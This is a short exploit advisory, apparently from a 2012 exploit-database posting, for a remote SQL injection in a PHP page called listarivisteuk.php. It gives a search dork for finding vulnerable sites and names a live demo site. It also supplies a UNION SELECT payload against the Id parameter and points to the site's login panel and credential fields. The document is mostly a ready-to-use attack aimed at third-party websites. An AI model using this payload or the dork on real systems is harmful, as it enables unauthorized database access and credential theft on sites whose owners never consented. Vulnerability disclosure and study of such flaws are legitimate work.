Studio Manolibera's listarivisteuk.php suffers from a remote SQL injection vulnerability.
28d2f1e146dd773e526708587175db0f5bfe66b4465bf4ec6d2d00fd23383036
########################################################
~ Exploit Title: * Listarivisteuk SQL Injection *~
~ Author: Th4 MasK
~ Contact to ; th4_mask@windowslive.com ~
~ Date : 27.01.2012 ~
~ Platform : Php ~
########################################################
~ Dork: listarivisteuk.php?Id?=
########################################################
~ Demo Site :
~ http://www.fgda.org/listarivisteuk.php?Id=1
Exploit :
http://localhost/listarivisteuk.php?Id?=(id)/**/AND/**/1=0/**/UNION/**/ALL/**/SELECT/**/@@version,/**/2--
Poc//
Panel :
HTTP://localhost/login.php
User :
User_login
Password :
User_pass
########################################################
~* Bilinmezlik Diyari
########################################################
~* Olmassa Olmazimdir. Bazi seyler.
########################################################
~* Email:th4_mask@windowslive.com~
~ Greetz: http://th4mask.blogspot.com ~ TurkWebSecurity.Net
########################################################
TWS Family
~ Evillord,Mugair,Nikolay,Darkness Devil
~ TurkWebSecurity.Net ~ http://th4mask.blogspot.com/
########################################################
Special Thanx : HancHer